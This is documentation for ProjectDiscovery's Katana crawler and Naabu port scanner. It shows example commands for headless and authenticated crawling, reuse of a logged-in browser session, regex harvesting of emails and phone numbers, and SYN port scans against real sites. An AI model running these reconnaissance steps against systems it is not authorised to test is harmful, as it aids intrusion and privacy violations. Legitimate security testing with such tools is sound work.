https://www.youtube.com/s/desktop/4965577f/jsbin/custom-elements-es5-adapter.vflset/custom-elements-es5-adapter.js
https://www.youtube.com/s/desktop/4965577f/jsbin/webcomponents-sd.vflset/webcomponents-sd.js
https://www.youtube.com/s/desktop/4965577f/jsbin/intersection-observer.min.vflset/intersection-observer.min.js
https://www.youtube.com/s/desktop/4965577f/jsbin/scheduler.vflset/scheduler.js
https://www.youtube.com/s/desktop/4965577f/jsbin/www-i18n-constants-en_GB.vflset/www-i18n-constants.js
https://www.youtube.com/s/desktop/4965577f/jsbin/www-tampering.vflset/www-tampering.js
https://www.youtube.com/s/desktop/4965577f/jsbin/spf.vflset/spf.js
https://www.youtube.com/s/desktop/4965577f/jsbin/network.vflset/network.js
https://www.youtube.com/howyoutubeworks/
https://www.youtube.com/trends/
https://www.youtube.com/jobs/
https://www.youtube.com/kids/
```
## Crawling Mode
### Standard Mode
Standard crawling mode uses the standard Go HTTP library under the hood to handle HTTP requests/responses. This mode is much faster as it doesn't have the browser overhead. However, it analyzes the HTTP response body as is, without any JavaScript or DOM rendering, potentially missing post-DOM-rendered endpoints or asynchronous endpoint calls that might happen in complex web applications depending, for example, on browser-specific events.
### Headless Mode
Headless mode hooks internal headless calls to handle HTTP requests/responses directly within the browser context. This offers two advantages:
* The HTTP fingerprint (TLS and user agent) fully identifies the client as a legitimate browser.
* Better coverage, since endpoints are discovered by analyzing both the standard raw response, as in the previous mode, and the browser-rendered response with JavaScript enabled.
Headless crawling is optional and can be enabled using `-headless` option.
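For example, a basic headless crawl of a single target:
```sh
katana -u https://tesla.com -headless
```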
Here are other headless CLI options -
```console
katana -h headless
Flags:
HEADLESS:
-hl, -headless enable headless hybrid crawling (experimental)
-sc, -system-chrome use local installed chrome browser instead of katana installed
-sb, -show-browser show the browser on the screen with headless mode
-ho, -headless-options string[] start headless chrome with additional options
-nos, -no-sandbox start headless chrome in --no-sandbox mode
-cdd, -chrome-data-dir string path to store chrome browser data
-scp, -system-chrome-path string use specified chrome browser for headless crawling
-noi, -no-incognito start headless chrome without incognito mode
-cwu, -chrome-ws-url string use chrome browser instance launched elsewhere with the debugger listening at this URL
-xhr, -xhr-extraction extract xhr requests
```
### `-no-sandbox`
***
Runs headless chrome browser with **no-sandbox** option, useful when running as root user.
```console
katana -u https://tesla.com -headless -no-sandbox
```
### *`-no-incognito`*
***
Runs headless chrome browser without incognito mode, useful when using the local browser.
```console
katana -u https://tesla.com -headless -no-incognito
```
### *`-headless-options`*
***
When crawling in headless mode, additional chrome options can be specified using `-headless-options`, for example -
```console
katana -u https://tesla.com -headless -system-chrome -headless-options --disable-gpu,proxy-server=http://127.0.0.1:8080
```
## Scope Control
Crawling can be endless if not scoped; as such, Katana comes with multiple options to define the crawl scope.
### *`-field-scope`*
***
The handiest option to define scope is with a predefined field name, `rdn` being the default option for field scope.
* `rdn` - crawling scoped to root domain name and all subdomains (e.g. `*example.com`) (default)
* `fqdn` - crawling scoped to given sub(domain) (e.g. `www.example.com` or `api.example.com`)
* `dn` - crawling scoped to domain name keyword (e.g. `example`)
```console
katana -u https://tesla.com -fs dn
```
### *`-crawl-scope`*
***
For advanced scope control, the `-cs` option can be used, which comes with **regex** support.
```console
katana -u https://tesla.com -cs login
```
For multiple in-scope rules, a file with multiline strings / regexes can be passed.
```bash
$ cat in_scope.txt
login/
admin/
app/
wordpress/
```
```console
katana -u https://tesla.com -cs in_scope.txt
```
### *`-crawl-out-scope`*
***
For defining what not to crawl, the `-cos` option can be used, which also supports **regex** input.
```console
katana -u https://tesla.com -cos logout
```
For multiple out-of-scope rules, a file with multiline strings / regexes can be passed.
```bash
$ cat out_of_scope.txt
/logout
/log_out
```
```console
katana -u https://tesla.com -cos out_of_scope.txt
```
### *`-no-scope`*
***
Katana defaults to the scope `*.domain`; the `-ns` option can be used to disable this and crawl the internet.
```console
katana -u https://tesla.com -ns
```
## *`-display-out-scope`*
By default, when the scope option is used, it also applies to the links displayed as output; as such, **external URLs are excluded by default**. To override this behavior, the `-do` option can be used to display all external URLs found in the scoped target URLs / endpoints.
```
katana -u https://tesla.com -do
```
Here are all the CLI options for scope control -
```console
katana -h scope
Flags:
SCOPE:
-cs, -crawl-scope string[] in scope url regex to be followed by crawler
-cos, -crawl-out-scope string[] out of scope url regex to be excluded by crawler
-fs, -field-scope string pre-defined scope field (dn,rdn,fqdn) (default "rdn")
-ns, -no-scope disables host based default scope
-do, -display-out-scope display external endpoint from scoped crawling
```
## Crawler Configuration
Katana comes with multiple options to configure and control the crawl the way we want.
### *`-depth`*
***
Option to define the `depth` to follow URLs for crawling; the greater the depth, the more endpoints crawled and the longer the crawl takes.
```
katana -u https://tesla.com -d 5
```
### *`-js-crawl`*
***
Option to enable JavaScript file parsing and crawling of endpoints discovered in JavaScript files; disabled by default.
```
katana -u https://tesla.com -jc
```
### *`-crawl-duration`*
***
Option to define a maximum crawl duration; disabled by default.
```
katana -u https://tesla.com -ct 2
```
### *`-known-files`*
***
Option to enable crawling of `robots.txt` and `sitemap.xml` files; disabled by default.
```
katana -u https://tesla.com -kf robotstxt,sitemapxml
```
### *`-automatic-form-fill`*
***
Option to enable automatic form filling for known / unknown fields. Known field values can be customized as needed by updating the form config file at `$HOME/.config/katana/form-config.yaml`.
Automatic form filling is an experimental feature.
```
katana -u https://tesla.com -aff
```
## Authenticated Crawling
Authenticated crawling involves including custom headers or cookies in HTTP requests to access protected resources. These headers provide authentication or authorization information, allowing you to crawl authenticated content / endpoints. You can specify headers directly on the command line or provide them as a file to katana to perform authenticated crawling.
> **Note**: The user needs to manually perform the authentication and export the session cookie / header to a file to use with katana.
### *`-headers`*
***
Option to add a custom header or cookie to the request.
> Syntax of [headers](https://datatracker.ietf.org/doc/html/rfc7230#section-3.2) in the HTTP specification
Here is an example of adding a cookie to the request:
```
katana -u https://tesla.com -H 'Cookie: usrsess=AmljNrESo'
```
It is also possible to supply headers or cookies as a file. For example:
```
$ cat cookie.txt
Cookie: PHPSESSIONID=XXXXXXXXX
X-API-KEY: XXXXX
TOKEN=XX
```
```
katana -u https://tesla.com -H cookie.txt
```
There are more options to configure when needed; here are all the config-related CLI options -
```console
katana -h config
Flags:
CONFIGURATION:
-r, -resolvers string[] list of custom resolver (file or comma separated)
-d, -depth int maximum depth to crawl (default 3)
-jc, -js-crawl enable endpoint parsing / crawling in javascript file
-ct, -crawl-duration int maximum duration to crawl the target for
-kf, -known-files string enable crawling of known files (all,robotstxt,sitemapxml)
-mrs, -max-response-size int maximum response size to read (default 9223372036854775807)
-timeout int time to wait for request in seconds (default 10)
-aff, -automatic-form-fill enable automatic form filling (experimental)
-fx, -form-extraction enable extraction of form, input, textarea & select elements
-retry int number of times to retry the request (default 1)
-proxy string http/socks5 proxy to use
-H, -headers string[] custom header/cookie to include in request
-config string path to the katana configuration file
-fc, -form-config string path to custom form configuration file
-flc, -field-config string path to custom field configuration file
-s, -strategy string Visit strategy (depth-first, breadth-first) (default "depth-first")
```
## Connecting to Active Browser Session
Katana can also connect to an active browser session where the user is already logged in and authenticated, and use it for crawling. The only requirement is to start the browser with remote debugging enabled.
Here is an example of starting the Chrome browser with remote debugging enabled and using it with katana -
**Step 1) First, locate the path of the Chrome executable**
| Operating System | Chromium Executable Location | Google Chrome Executable Location |
| ---------------- | --------------------------------------------------------------- | -------------------------------------------------------------- |
| Windows (64-bit) | `C:\Program Files (x86)\Google\Chromium\Application\chrome.exe` | `C:\Program Files (x86)\Google\Chrome\Application\chrome.exe` |
| Windows (32-bit) | `C:\Program Files\Google\Chromium\Application\chrome.exe` | `C:\Program Files\Google\Chrome\Application\chrome.exe` |
| macOS | `/Applications/Chromium.app/Contents/MacOS/Chromium` | `/Applications/Google Chrome.app/Contents/MacOS/Google Chrome` |
| Linux | `/usr/bin/chromium` | `/usr/bin/google-chrome` |
**Step 2) Start Chrome with remote debugging enabled; it will return a websocket URL. For example, on macOS, you can start Chrome with remote debugging enabled using the following command** -
```console
$ /Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222
DevTools listening on ws://127.0.0.1:9222/devtools/browser/c5316c9c-19d6-42dc-847a-41d1aeebf7d6
```
> Now log in to the website you want to crawl and keep the browser open.
**Step 3) Now use the websocket URL with katana to connect to the active browser session and crawl the website**
```console
katana -headless -u https://tesla.com -cwu ws://127.0.0.1:9222/devtools/browser/c5316c9c-19d6-42dc-847a-41d1aeebf7d6 -no-incognito
```
> **Note**: You can use the `-cdd` option to specify a custom Chrome data directory to store browser data and cookies, but this does not save session data if the cookie is set to `Session` only or expires after a certain time.
## Filters
### *`-field`*
***
Katana comes with built-in fields that can be used to filter the output for the desired information; the `-f` option can be used to specify any of the available fields.
```
-f, -field string field to display in output (url,path,fqdn,rdn,rurl,qurl,qpath,file,key,value,kv,dir,udir)
```
Here is a table with examples of each field and expected output when used -
| FIELD | DESCRIPTION | EXAMPLE |
| ------- | --------------------------- | ----------------------------------------------------------------------------- |
| `url` | URL Endpoint | `https://admin.projectdiscovery.io/admin/login?user=admin&password=admin` |
| `qurl` | URL including query param | `https://admin.projectdiscovery.io/admin/login.php?user=admin&password=admin` |
| `qpath` | Path including query param | `/login?user=admin&password=admin` |
| `path` | URL Path | `https://admin.projectdiscovery.io/admin/login` |
| `fqdn` | Fully Qualified Domain name | `admin.projectdiscovery.io` |
| `rdn` | Root Domain name | `projectdiscovery.io` |
| `rurl` | Root URL | `https://admin.projectdiscovery.io` |
| `ufile` | URL with File | `https://admin.projectdiscovery.io/login.js` |
| `file` | Filename in URL | `login.php` |
| `key` | Parameter keys in URL | `user,password` |
| `value` | Parameter values in URL | `admin,admin` |
| `kv` | Keys=Values in URL | `user=admin&password=admin` |
| `dir` | URL Directory name | `/admin/` |
| `udir` | URL with Directory | `https://admin.projectdiscovery.io/admin/` |
Here is an example of using the field option to display only the URLs with query parameters in them -
```
katana -u https://tesla.com -f qurl -silent
https://shop.tesla.com/en_au?redirect=no
https://shop.tesla.com/en_nz?redirect=no
https://shop.tesla.com/product/men_s-raven-lightweight-zip-up-bomber-jacket?sku=1740250-00-A
https://shop.tesla.com/product/tesla-shop-gift-card?sku=1767247-00-A
https://shop.tesla.com/product/men_s-chill-crew-neck-sweatshirt?sku=1740176-00-A
https://www.tesla.com/about?redirect=no
https://www.tesla.com/about/legal?redirect=no
https://www.tesla.com/findus/list?redirect=no
```
### Custom Fields
You can create custom fields to extract and store specific information from page responses using regex rules. These custom fields are defined using a YAML config file and are loaded from the default location at `$HOME/.config/katana/field-config.yaml`. Alternatively, you can use the `-flc` option to load a custom field config file from a different location.
Here is example custom field.
```yaml
- name: email
type: regex
regex:
- '([a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)'
- '([a-zA-Z0-9+._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)'
- name: phone
type: regex
regex:
- '\d{3}-\d{8}|\d{4}-\d{7}'
```
When defining custom fields, the following attributes are supported:
* **name** (required)
> The value of the **name** attribute is used as the `-field` CLI option value.
* **type** (required)
> The type of the custom attribute; currently supported option - `regex`
* **part** (optional)
> The part of the response to extract the information from. The default value is `response`, which includes both the header and body. Other possible values are `header` and `body`.
* **group** (optional)
> You can use this attribute to select a specific matched group in regex, for example: `group: 1`
#### Running katana using custom field:
```console
katana -u https://tesla.com -f email,phone
```
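To load the field definitions from a non-default location, the `-flc` option mentioned above can be combined with the custom field names (the file path here is just an example):
```sh
katana -u https://tesla.com -flc /path/to/field-config.yaml -f email,phone
```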
## *`-store-field`*
To complement the `field` option, which is useful for filtering output at run time, there is the `-sf, -store-fields` option, which works exactly like the field option except that instead of filtering, it stores all the information on disk under the `katana_field` directory, sorted by target URL.
```
katana -u https://tesla.com -sf key,fqdn,qurl -silent
```
```bash
$ ls katana_field/
https_www.tesla.com_fqdn.txt
https_www.tesla.com_key.txt
https_www.tesla.com_qurl.txt
```
The `-store-field` option can be useful for collecting information to build a targeted wordlist for various purposes, including but not limited to:
* Identifying the most commonly used parameters
* Discovering frequently used paths
* Finding commonly used files
* Identifying related or unknown subdomains
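For example, the per-host files written by `-store-field` can be merged and de-duplicated into a simple wordlist with standard Unix tools (a sketch based on the files shown above):
```sh
# collect all discovered parameter keys into one wordlist
cat katana_field/*_key.txt | sort -u > params_wordlist.txt
```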
## Katana Filters
### *`-extension-match`*
***
Crawl output can easily be matched for specific extensions using the `-em` option, which ensures only output containing the given extensions is displayed.
```
katana -u https://tesla.com -silent -em js,jsp,json
```
### *`-extension-filter`*
***
Crawl output can easily be filtered for specific extensions using the `-ef` option, which removes all URLs containing the given extensions.
```
katana -u https://tesla.com -silent -ef css,txt,md
```
### *`-match-regex`*
***
The `-match-regex` or `-mr` flag allows you to filter output URLs using regular expressions. When using this flag, only URLs that match the specified regular expression will be printed in the output.
```
katana -u https://tesla.com -mr 'https://shop\.tesla\.com/*' -silent
```
## *`-filter-regex`*
The `-filter-regex` or `-fr` flag allows you to filter output URLs using regular expressions. When using this flag, URLs that match the specified regular expression will be skipped.
```
katana -u https://tesla.com -fr 'https://www\.tesla\.com/*' -silent
```
### Advanced Filtering
Katana supports DSL-based expressions for advanced matching and filtering capabilities:
* To match endpoints with a 200 status code:
```shell
katana -u https://www.hackerone.com -mdc 'status_code == 200'
```
* To match endpoints that contain "default" and have a status code other than 403:
```shell
katana -u https://www.hackerone.com -mdc 'contains(endpoint, "default") && status_code != 403'
```
* To match endpoints with PHP technologies:
```shell
katana -u https://www.hackerone.com -mdc 'contains(to_lower(technologies), "php")'
```
* To filter out endpoints running on Cloudflare:
```shell
katana -u https://www.hackerone.com -fdc 'contains(to_lower(technologies), "cloudflare")'
```
DSL functions can be applied to any keys in the jsonl output. For more information on available DSL functions, please visit the [dsl project](https://github.com/projectdiscovery/dsl).
Here are additional filter options -
```console
katana -h filter
Flags:
FILTER:
-mr, -match-regex string[] regex or list of regex to match on output url (cli, file)
-fr, -filter-regex string[] regex or list of regex to filter on output url (cli, file)
-f, -field string field to display in output (url,path,fqdn,rdn,rurl,qurl,qpath,file,ufile,key,value,kv,dir,udir)
-sf, -store-field string field to store in per-host output (url,path,fqdn,rdn,rurl,qurl,qpath,file,ufile,key,value,kv,dir,udir)
-em, -extension-match string[] match output for given extension (eg, -em php,html,js)
-ef, -extension-filter string[] filter output for given extension (eg, -ef png,css)
-mdc, -match-condition string match response with dsl based condition
-fdc, -filter-condition string filter response with dsl based condition
```
## Rate Limit
It's easy to get blocked / banned while crawling if you don't follow target websites' limits; katana comes with multiple options to tune the crawl to go as fast / slow as we want.
### *`-delay`*
***
Option to introduce a delay in seconds between each new request katana makes while crawling; disabled by default.
```
katana -u https://tesla.com -delay 20
```
### *`-concurrency`*
***
Option to control the number of URLs per target to fetch at the same time.
```
katana -u https://tesla.com -c 20
```
### *`-parallelism`*
***
Option to define the number of targets to process at the same time from list input.
```
katana -u https://tesla.com -p 20
```
### *`-rate-limit`*
***
Option to define the maximum number of requests that can go out per second.
```
katana -u https://tesla.com -rl 100
```
### *`-rate-limit-minute`*
***
Option to define the maximum number of requests that can go out per minute.
```
katana -u https://tesla.com -rlm 500
```
Here are all the long / short CLI options for rate limit control -
```console
katana -h rate-limit
Flags:
RATE-LIMIT:
-c, -concurrency int number of concurrent fetchers to use (default 10)
-p, -parallelism int number of concurrent inputs to process (default 10)
-rd, -delay int request delay between each request in seconds
-rl, -rate-limit int maximum requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute
```
## Output
Katana supports file output in both plain text and JSON formats; JSON output includes additional information such as `source`, `tag`, and `attribute` name to correlate the discovered endpoint.
### *`-output`*
By default, katana outputs the crawled endpoints in plain text format. The results can be written to a file by using the `-output` option.
```console
katana -u https://example.com -no-scope -output example_endpoints.txt
```
### *`-jsonl`*
***
```console
katana -u https://example.com -jsonl | jq .
```
```json
{
"timestamp": "2023-03-20T16:23:58.027559+05:30",
"request": {
"method": "GET",
"endpoint": "https://example.com",
"raw": "GET / HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\r\nAccept-Encoding: gzip\r\n\r\n"
},
"response": {
"status_code": 200,
"headers": {
"accept_ranges": "bytes",
"expires": "Mon, 27 Mar 2023 10:53:58 GMT",
"last_modified": "Thu, 17 Oct 2019 07:18:26 GMT",
"content_type": "text/html; charset=UTF-8",
"server": "ECS (dcb/7EA3)",
"vary": "Accept-Encoding",
"etag": "\"3147526947\"",
"cache_control": "max-age=604800",
"x_cache": "HIT",
"date": "Mon, 20 Mar 2023 10:53:58 GMT",
"age": "331239"
},
"body": "\n\n\n Example Domain\n\n \n \n \n \n\n\n\n
\n
Example Domain
\n
This domain is for use in illustrative examples in documents. You may use this\n domain in literature without prior coordination or asking for permission.
This domain is for use in illustrative examples in documents. You may use this\n domain in literature without prior coordination or asking for permission.
\n\n\n"
}
}
```
### *`-store-response`*
***
The `-store-response` option allows for writing all crawled endpoint requests and responses to a text file. When this option is used, text files including the request and response will be written to the **katana\_response** directory. If you would like to specify a custom directory, you can use the `-store-response-dir` option.
```console
katana -u https://example.com -no-scope -store-response
```
```bash
$ cat katana_response/index.txt
katana_response/example.com/327c3fda87ce286848a574982ddd0b7c7487f816.txt https://example.com (200 OK)
katana_response/www.iana.org/bfc096e6dd93b993ca8918bf4c08fdc707a70723.txt http://www.iana.org/domains/reserved (200 OK)
```
**Note:**
*`-store-response` option is not supported in `-headless` mode.*
Here are additional CLI options related to output -
```console
katana -h output
OUTPUT:
-o, -output string file to write output to
-sr, -store-response store http requests/responses
-srd, -store-response-dir string store http requests/responses to custom directory
-j, -json write output in JSONL(ines) format
-nc, -no-color disable output content coloring (ANSI escape codes)
-silent display output only
-v, -verbose display verbose output
-version display project version
```
## Katana as a library
`katana` can be used as a library by creating an instance of the `Option` struct and populating it with the same options that would be specified via the CLI. Using the options, you can create `crawlerOptions` and then a standard or hybrid `crawler`.
The `crawler.Crawl` method should be called to crawl the input.
```go
package main
import (
"math"
"github.com/projectdiscovery/gologger"
"github.com/projectdiscovery/katana/pkg/engine/standard"
"github.com/projectdiscovery/katana/pkg/output"
"github.com/projectdiscovery/katana/pkg/types"
)
func main() {
options := &types.Options{
MaxDepth: 3, // Maximum depth to crawl
FieldScope: "rdn", // Crawling Scope Field
BodyReadSize: math.MaxInt, // Maximum response size to read
Timeout: 10, // Timeout is the time to wait for request in seconds
Concurrency: 10, // Concurrency is the number of concurrent crawling goroutines
Parallelism: 10, // Parallelism is the number of urls processing goroutines
Delay: 0, // Delay is the delay between each crawl requests in seconds
RateLimit: 150, // Maximum requests to send per second
Strategy: "depth-first", // Visit strategy (depth-first, breadth-first)
OnResult: func(result output.Result) { // Callback function to execute for result
gologger.Info().Msg(result.Request.URL)
},
}
crawlerOptions, err := types.NewCrawlerOptions(options)
if err != nil {
gologger.Fatal().Msg(err.Error())
}
defer crawlerOptions.Close()
crawler, err := standard.New(crawlerOptions)
if err != nil {
gologger.Fatal().Msg(err.Error())
}
defer crawler.Close()
var input = "https://www.hackerone.com"
err = crawler.Crawl(input)
if err != nil {
gologger.Warning().Msgf("Could not crawl %s: %s", input, err.Error())
}
}
```
# Katana Usage
Source: https://docs.projectdiscovery.io/tools/katana/usage
Review Katana usage including flags, configs, and options
## Access help
Use `katana -h` to display all help options.
## Katana help options
```
Flags:
INPUT:
-u, -list string[] target url / list to crawl
CONFIGURATION:
-r, -resolvers string[] list of custom resolver (file or comma separated)
-d, -depth int maximum depth to crawl (default 3)
-jc, -js-crawl enable endpoint parsing / crawling in javascript file
-jsl, -jsluice enable jsluice parsing in javascript file (memory intensive)
-ct, -crawl-duration value maximum duration to crawl the target for (s, m, h, d) (default s)
-kf, -known-files string enable crawling of known files (all,robotstxt,sitemapxml)
-mrs, -max-response-size int maximum response size to read (default 9223372036854775807)
-timeout int time to wait for request in seconds (default 10)
-aff, -automatic-form-fill enable automatic form filling (experimental)
-fx, -form-extraction extract form, input, textarea & select elements in jsonl output
-retry int number of times to retry the request (default 1)
-proxy string http/socks5 proxy to use
-H, -headers string[] custom header/cookie to include in all http request in header:value format (file)
-config string path to the katana configuration file
-fc, -form-config string path to custom form configuration file
-flc, -field-config string path to custom field configuration file
-s, -strategy string Visit strategy (depth-first, breadth-first) (default "depth-first")
-iqp, -ignore-query-params Ignore crawling same path with different query-param values
-tlsi, -tls-impersonate enable experimental client hello (ja3) tls randomization
DEBUG:
-health-check, -hc run diagnostic check up
-elog, -error-log string file to write sent requests error log
HEADLESS:
-hl, -headless enable headless hybrid crawling (experimental)
-sc, -system-chrome use local installed chrome browser instead of katana installed
-sb, -show-browser show the browser on the screen with headless mode
-ho, -headless-options string[] start headless chrome with additional options
-nos, -no-sandbox start headless chrome in --no-sandbox mode
-cdd, -chrome-data-dir string path to store chrome browser data
-scp, -system-chrome-path string use specified chrome browser for headless crawling
-noi, -no-incognito start headless chrome without incognito mode
-cwu, -chrome-ws-url string use chrome browser instance launched elsewhere with the debugger listening at this URL
-xhr, -xhr-extraction extract xhr request url,method in jsonl output
SCOPE:
-cs, -crawl-scope string[] in scope url regex to be followed by crawler
-cos, -crawl-out-scope string[] out of scope url regex to be excluded by crawler
-fs, -field-scope string pre-defined scope field (dn,rdn,fqdn) or custom regex (e.g., '(company-staging.io|company.com)') (default "rdn")
-ns, -no-scope disables host based default scope
-do, -display-out-scope display external endpoint from scoped crawling
FILTER:
-mr, -match-regex string[] regex or list of regex to match on output url (cli, file)
-fr, -filter-regex string[] regex or list of regex to filter on output url (cli, file)
-f, -field string field to display in output (url,path,fqdn,rdn,rurl,qurl,qpath,file,ufile,key,value,kv,dir,udir)
-sf, -store-field string field to store in per-host output (url,path,fqdn,rdn,rurl,qurl,qpath,file,ufile,key,value,kv,dir,udir)
-em, -extension-match string[] match output for given extension (eg, -em php,html,js)
-ef, -extension-filter string[] filter output for given extension (eg, -ef png,css)
-mdc, -match-condition string match response with dsl based condition
-fdc, -filter-condition string filter response with dsl based condition
RATE-LIMIT:
-c, -concurrency int number of concurrent fetchers to use (default 10)
-p, -parallelism int number of concurrent inputs to process (default 10)
-rd, -delay int request delay between each request in seconds
-rl, -rate-limit int maximum requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute
UPDATE:
-up, -update update katana to latest version
-duc, -disable-update-check disable automatic katana update check
OUTPUT:
-o, -output string file to write output to
-sr, -store-response store http requests/responses
-srd, -store-response-dir string store http requests/responses to custom directory
-or, -omit-raw omit raw requests/responses from jsonl output
-ob, -omit-body omit response body from jsonl output
-j, -jsonl write output in jsonl format
-nc, -no-color disable output content coloring (ANSI escape codes)
-silent display output only
-v, -verbose display verbose output
-debug display debug output
-version display project version
```
# Installing Naabu
Source: https://docs.projectdiscovery.io/tools/naabu/install
Learn about how to install Naabu and get started
Enter the command below in a terminal to install ProjectDiscovery's Naabu using Go.
```bash
go install -v github.com/projectdiscovery/naabu/cmd/naabu@latest
```
```bash
https://github.com/projectdiscovery/naabu/releases/
```
* Download the latest binary for your OS.
* Unzip the ready to run binary.
## Installation Notes
* Naabu requires the latest version of [**Go**](https://go.dev/doc/install)
* Add the Go bin path to the system paths. On OSX or Linux, in your terminal use
```
echo 'export PATH=$PATH:$HOME/go/bin' >> $HOME/.bashrc
source $HOME/.bashrc
```
* To add the Go bin path in Windows, [click this link for instructions.](https://www.architectryan.com/2018/03/17/add-to-the-path-on-windows-10/)
* The binary will be located in `$HOME/go/bin/naabu`
# Naabu Overview
Source: https://docs.projectdiscovery.io/tools/naabu/overview
A Go-based port scanning tool to quickly enumerate valid ports
# What is **Naabu?**
Naabu is a port scanning tool written in Go that enumerates valid ports for hosts in a fast and reliable manner. It is a really simple tool that does fast SYN/CONNECT/UDP scans on the host or list of hosts and provides all ports that return a reply.
## Features and capabilities
* Fast And Simple **SYN/CONNECT/UDP** probe based scanning
* Optimized for ease of use and **lightweight** on resources
* **DNS** Port scan
* **Automatic IP Deduplication** for DNS port scan
* **IPv4/IPv6** Port scan (**experimental**)
* **Passive** Port enumeration using Shodan [Internetdb](https://internetdb.shodan.io)
* **Host Discovery** scan (**experimental**)
* **NMAP** integration for service discovery
* Multiple input support - **STDIN/HOST/IP/CIDR/ASN**
* Multiple output format support - **JSON/TXT/STDOUT**
## Additional Naabu Resources
As an open source tool with a robust community there are a lot of community-created resources available.
We are happy to share those to offer even more information about our tools.
ProjectDiscovery's Naabu should not be confused with other similarly named tools. Sharing these resources **is not formal approval or a recommendation** from ProjectDiscovery.
We cannot provide an endorsement of accuracy or validation that content is up-to-date. Anything shared here should be approached with caution.
* [https://mrshan.medium.com/naabu-port-scanner-why-you-should-use-it-947d8ca025df](https://mrshan.medium.com/naabu-port-scanner-why-you-should-use-it-947d8ca025df)
* [https://highon.coffee/blog/naabu-cheat-sheet/](https://highon.coffee/blog/naabu-cheat-sheet/)
## Support
Questions about using Naabu? Issues working through installation? Cool story or use case you want to share? Get in touch!
Check out the [Help](/help) section of the docs or reach out to us on [Discord](https://discord.com/invite/projectdiscovery).
# Running Naabu
Source: https://docs.projectdiscovery.io/tools/naabu/running
Learn about running Naabu with examples and sample output
For all of the flags and options available for `naabu`, be sure to check out the [Usage](/tools/naabu/usage) page. On this page we'll share examples running naabu with specific flags and goals
and the output you can expect from each.
If you have questions, reach out to us through [Help](/help).
## Basic Examples
# Running Naabu
To run the tool on a target, just use the following command.
```sh
naabu -host hackerone.com
```
This will run the tool against hackerone.com. There are a number of configuration options that you can pass along with this command. The verbose switch `-v` can be used to display verbose information.
```console
naabu -host hackerone.com
__
___ ___ ___ _/ / __ __
/ _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/ v2.0.3
projectdiscovery.io
[WRN] Use with caution. You are responsible for your actions
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[INF] Running SYN scan with root privileges
[INF] Found 4 ports on host hackerone.com (104.16.100.52)
hackerone.com:80
hackerone.com:443
hackerone.com:8443
hackerone.com:8080
```
The ports to scan for on the host can be specified via `-p` parameter (udp ports must be expressed as `u:port`). It takes nmap format ports and runs enumeration on them.
```sh
naabu -p 80,443,21-23,u:53 -host hackerone.com
```
By default, Naabu checks for nmap's `Top 100` ports. It supports the following in-built port lists:
| Flag | Description |
| ----------------- | ------------------------------------ |
| `-top-ports 100`  | Scan for nmap top **100** ports      |
| `-top-ports 1000` | Scan for nmap top **1000** ports     |
| `-p -`            | Scan the full port range **1-65535** |
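For example, to scan the nmap top 1000 ports of a host:
```sh
naabu -host hackerone.com -top-ports 1000
```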
You can also specify specific ports which you would like to exclude from the scan.
```sh
naabu -p - -exclude-ports 80,443
```
To run naabu on a list of hosts, the `-list` option can be used.
```sh
naabu -list hosts.txt
```
To run naabu on an ASN, the ASN can be provided as input. Naabu takes the IP addresses available for the given ASN and runs the enumeration on them.
```console
echo AS14421 | naabu -p 80,443
216.101.17.249:80
216.101.17.249:443
216.101.17.248:443
216.101.17.252:443
216.101.17.251:80
216.101.17.251:443
216.101.17.250:443
216.101.17.250:80
```
You can also get output in JSON format using the `-json` switch. This switch saves the output in the JSON Lines format.
```console
naabu -host 104.16.99.52 -json
{"ip":"104.16.99.52","port":443}
{"ip":"104.16.99.52","port":80}
```
The ports discovered can be piped to other tools too. For example, you can pipe the ports discovered by naabu to [httpx](https://github.com/projectdiscovery/httpx) which will then find running http servers on the host.
```console
echo hackerone.com | naabu -silent | httpx -silent
http://hackerone.com:8443
http://hackerone.com:443
http://hackerone.com:8080
http://hackerone.com:80
```
The speed can be controlled by changing the value of the `-rate` flag, which represents the number of packets to send per second. Increasing it while processing hosts may lead to increased false-positive rates, so it is recommended to keep it at a reasonable value.
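For example, to lower the packet rate (the value below is illustrative, not a recommendation):
```sh
naabu -host hackerone.com -rate 500
```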
# IPv4 and IPv6
Naabu supports both IPv4 and IPv6. Both ranges can be piped together as input. If IPv6 is used, connectivity must be correctly configured, and the network interface must have an IPv6 address assigned (`inet6`) and a default gateway.
```console
echo hackerone.com | dnsx -resp-only -a -aaaa -silent | naabu -p 80 -silent
104.16.99.52:80
104.16.100.52:80
2606:4700::6810:6434:80
2606:4700::6810:6334:80
```
The option `-ip-version 6` makes the tool use IPv6 addresses while resolving domain names.
```console
echo hackerone.com | ./naabu -p 80 -ip-version 6
__
___ ___ ___ _/ / __ __
/ _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/ v2.0.8
projectdiscovery.io
Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
[INF] Running CONNECT scan with non root privileges
[INF] Found 1 ports on host hackerone.com (2606:4700::6810:6334)
hackerone.com:80
```
To scan all the IPs of both versions, `-ip-version 4,6` can be used along with the `-scan-all-ips` flag.
```console
echo hackerone.com | ./naabu -iv 4,6 -sa -p 80 -silent
[INF] Found 1 ports on host hackerone.com (104.16.100.52)
hackerone.com:80
[INF] Found 1 ports on host hackerone.com (104.16.99.52)
hackerone.com:80
[INF] Found 1 ports on host hackerone.com (2606:4700::6810:6334)
hackerone.com:80
[INF] Found 1 ports on host hackerone.com (2606:4700::6810:6434)
hackerone.com:80
```
# Host Discovery
Naabu optionally supports multiple options to perform host discovery, as outlined below. Host discovery is completed automatically before beginning a connect/syn scan if the process has enough privileges. The `-sn` flag instructs the tool to perform host discovery only, while the `-Pn` flag skips the host discovery phase. Host discovery is completed using multiple internal methods; you can choose the desired approach by setting the available options (see the example after the list below).
Available options to perform host discovery:
* **ARP** ping (`-arp`)
* TCP **SYN** ping (`-ps 80`)
* TCP **ACK** ping (`-pa 443`)
* ICMP **echo** ping (`-pe`)
